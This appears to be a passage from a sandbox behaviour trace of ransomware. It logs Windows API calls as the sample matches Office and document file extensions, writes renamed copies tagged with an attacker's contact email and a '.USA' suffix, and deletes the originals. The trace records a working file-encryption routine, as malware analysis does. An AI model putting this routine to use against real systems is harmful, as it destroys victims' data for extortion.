lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 63 [0060.247] lstrlenW (lpString=".1cd") returned 4 [0060.247] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 63 [0060.247] lstrlenW (lpString=".jpg") returned 4 [0060.247] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.247] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=3524) returned 1 [0060.247] CloseHandle (hObject=0x214) returned 1 [0060.248] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00441_.wmf")) returned 0x20 [0060.248] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00441_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0060.248] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00441_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0060.248] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.248] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.248] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00441_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0060.248] GetLastError () returned 0x0 [0060.248] ReadFile (in: hFile=0x214, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0xdc4, lpOverlapped=0x0) returned 1 [0060.250] WriteFile (in: hFile=0x1a0, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xdd0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xdd0, lpOverlapped=0x0) returned 1 [0060.251] ReadFile (in: hFile=0x214, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0060.251] WriteFile (in: hFile=0x1a0, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.251] SetEndOfFile (hFile=0x1a0) returned 1 [0060.251] CloseHandle (hObject=0x1a0) returned 1 [0060.251] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.252] SetEndOfFile (hFile=0x214) returned 1 [0060.252] CloseHandle (hObject=0x214) returned 1 [0060.252] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0060.253] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00441_.wmf")) returned 1 [0060.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 63 [0060.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 63 [0060.253] lstrlenW (lpString=".doc") returned 4 [0060.253] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.253] lstrlenW (lpString=".docx") returned 5 [0060.253] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.253] lstrlenW (lpString=".pdf") returned 4 [0060.253] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.253] lstrlenW (lpString=".xls") returned 4 [0060.253] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.253] lstrlenW (lpString=".xlsx") returned 5 [0060.253] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.253] lstrlenW (lpString=".ppt") returned 4 [0060.253] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 63 [0060.253] lstrlenW (lpString=".zip") returned 4 [0060.253] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.253] lstrlenW (lpString=".rar") returned 4 [0060.253] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.253] lstrlenW (lpString=".bz2") returned 4 [0060.253] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.253] lstrlenW (lpString=".7z") returned 3 [0060.253] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 63 [0060.253] lstrlenW (lpString=".dbf") returned 4 [0060.254] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 63 [0060.254] lstrlenW (lpString=".1cd") returned 4 [0060.254] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 63 [0060.254] lstrlenW (lpString=".jpg") returned 4 [0060.254] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.254] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=2488) returned 1 [0060.254] CloseHandle (hObject=0x214) returned 1 [0060.254] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00442_.wmf")) returned 0x20 [0060.254] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00442_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0060.254] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00442_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0060.254] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.254] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.255] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00442_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0060.255] GetLastError () returned 0x0 [0060.255] ReadFile (in: hFile=0x214, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x9b8, lpOverlapped=0x0) returned 1 [0060.256] WriteFile (in: hFile=0x1a0, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x9c0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x9c0, lpOverlapped=0x0) returned 1 [0060.257] ReadFile (in: hFile=0x214, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0060.257] WriteFile (in: hFile=0x1a0, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.257] SetEndOfFile (hFile=0x1a0) returned 1 [0060.257] CloseHandle (hObject=0x1a0) returned 1 [0060.257] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.257] SetEndOfFile (hFile=0x214) returned 1 [0060.258] CloseHandle (hObject=0x214) returned 1 [0060.258] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0060.258] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00442_.wmf")) returned 1 [0060.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 63 [0060.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 63 [0060.259] lstrlenW (lpString=".doc") returned 4 [0060.259] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.259] lstrlenW (lpString=".docx") returned 5 [0060.259] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.259] lstrlenW (lpString=".pdf") returned 4 [0060.259] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.259] lstrlenW (lpString=".xls") returned 4 [0060.259] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.259] lstrlenW (lpString=".xlsx") returned 5 [0060.259] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.259] lstrlenW (lpString=".ppt") returned 4 [0060.259] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 63 [0060.259] lstrlenW (lpString=".zip") returned 4 [0060.259] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.259] lstrlenW (lpString=".rar") returned 4 [0060.259] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.259] lstrlenW (lpString=".bz2") returned 4 [0060.259] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.259] lstrlenW (lpString=".7z") returned 3 [0060.259] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 63 [0060.259] lstrlenW (lpString=".dbf") returned 4 [0060.259] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 63 [0060.259] lstrlenW (lpString=".1cd") returned 4 [0060.259] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 63 [0060.259] lstrlenW (lpString=".jpg") returned 4 [0060.259] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.260] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=1676) returned 1 [0060.260] CloseHandle (hObject=0x214) returned 1 [0060.260] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00443_.wmf")) returned 0x20 [0060.260] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00443_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0060.260] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00443_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0060.260] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.260] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.260] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00443_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0060.261] GetLastError () returned 0x0 [0060.261] ReadFile (in: hFile=0x214, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x68c, lpOverlapped=0x0) returned 1 [0060.627] WriteFile (in: hFile=0x1a0, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x690, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x690, lpOverlapped=0x0) returned 1 [0060.628] ReadFile (in: hFile=0x214, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0060.628] WriteFile (in: hFile=0x1a0, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.628] SetEndOfFile (hFile=0x1a0) returned 1 [0060.753] CloseHandle (hObject=0x1a0) returned 1 [0060.753] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.753] SetEndOfFile (hFile=0x214) returned 1 [0060.754] CloseHandle (hObject=0x214) returned 1 [0060.754] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0060.754] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00443_.wmf")) Thread: id = 13 os_tid = 0x9b0 [0033.096] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10000) returned 0x6b08c0 [0033.096] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10000) returned 0x3760048 [0033.097] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x670178 [0033.097] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x6) returned 0x6240f8 [0033.097] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x670190 [0033.097] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x100000) returned 0x3860020 [0033.097] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x6701a8 [0033.097] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6701a8, Size=0x20) returned 0x626730 [0033.097] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x6701a8 [0033.097] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6701a8, Size=0x20) returned 0x626708 [0033.097] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0033.097] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0033.097] Wow64DisableWow64FsRedirection (in: OldValue=0x2deff58 | out: OldValue=0x2deff58*=0x0) returned 1 [0033.097] lstrlenW (lpString="kernel32.dll") returned 12 [0033.097] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x626730 | out: hHeap=0x5d0000) returned 1 [0033.097] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0033.097] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x626708 | out: hHeap=0x5d0000) returned 1 [0033.098] Sleep (dwMilliseconds=0x64) [0033.964] Sleep (dwMilliseconds=0x64) [0034.110] Sleep (dwMilliseconds=0x64) [0034.381] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.381] lstrlenW (lpString="Proof.xml") returned 9 [0034.381] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0034.382] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=1458) returned 1 [0034.382] CloseHandle (hObject=0x160) returned 1 [0034.382] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml")) returned 0x2020 [0034.382] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.382] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0034.382] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0034.382] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0034.382] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0034.383] GetLastError () returned 0x0 [0034.383] ReadFile (in: hFile=0x160, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x5b2, lpOverlapped=0x0) returned 1 [0034.396] WriteFile (in: hFile=0x16c, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x5c0, lpOverlapped=0x0) returned 1 [0034.397] ReadFile (in: hFile=0x160, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0034.397] WriteFile (in: hFile=0x16c, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.398] SetEndOfFile (hFile=0x16c) returned 1 [0034.398] CloseHandle (hObject=0x16c) returned 1 [0034.398] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0034.399] SetEndOfFile (hFile=0x160) returned 1 [0034.399] CloseHandle (hObject=0x160) returned 1 [0034.399] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0034.400] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml")) returned 1 [0034.400] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0034.400] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0034.400] lstrlenW (lpString=".doc") returned 4 [0034.400] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.400] lstrlenW (lpString=".docx") returned 5 [0034.400] lstrcmpiW (lpString1=".docx", lpString2="f.xml") returned -1 [0034.400] lstrlenW (lpString=".pdf") returned 4 [0034.400] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.400] lstrlenW (lpString=".xls") returned 4 [0034.400] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.400] lstrlenW (lpString=".xlsx") returned 5 [0034.400] lstrcmpiW (lpString1=".xlsx", lpString2="f.xml") returned -1 [0034.400] lstrlenW (lpString=".ppt") returned 4 [0034.400] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.400] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0034.400] lstrlenW (lpString=".zip") returned 4 [0034.400] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.400] lstrlenW (lpString=".rar") returned 4 [0034.400] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.400] lstrlenW (lpString=".bz2") returned 4 [0034.400] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.400] lstrlenW (lpString=".7z") returned 3 [0034.401] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.401] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0034.401] lstrlenW (lpString=".dbf") returned 4 [0034.401] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.401] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0034.401] lstrlenW (lpString=".1cd") returned 4 [0034.401] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.401] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0034.401] lstrlenW (lpString=".jpg") returned 4 [0034.401] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.401] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0034.401] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0034.401] lstrlenW (lpString=".doc") returned 4 [0034.401] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.401] lstrlenW (lpString=".docx") returned 5 [0034.401] lstrcmpiW (lpString1=".docx", lpString2="f.xml") returned -1 [0034.401] lstrlenW (lpString=".pdf") returned 4 [0034.401] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.401] lstrlenW (lpString=".xls") returned 4 [0034.401] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.401] lstrlenW (lpString=".xlsx") returned 5 [0034.401] lstrcmpiW (lpString1=".xlsx", lpString2="f.xml") returned -1 [0034.401] lstrlenW (lpString=".ppt") returned 4 [0034.401] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.401] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0034.401] lstrlenW (lpString=".zip") returned 4 [0034.401] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.401] lstrlenW (lpString=".rar") returned 4 [0034.401] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.401] lstrlenW (lpString=".bz2") returned 4 [0034.401] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.401] lstrlenW (lpString=".7z") returned 3 [0034.402] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.402] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0034.402] lstrlenW (lpString=".dbf") returned 4 [0034.402] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.402] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0034.402] lstrlenW (lpString=".1cd") returned 4 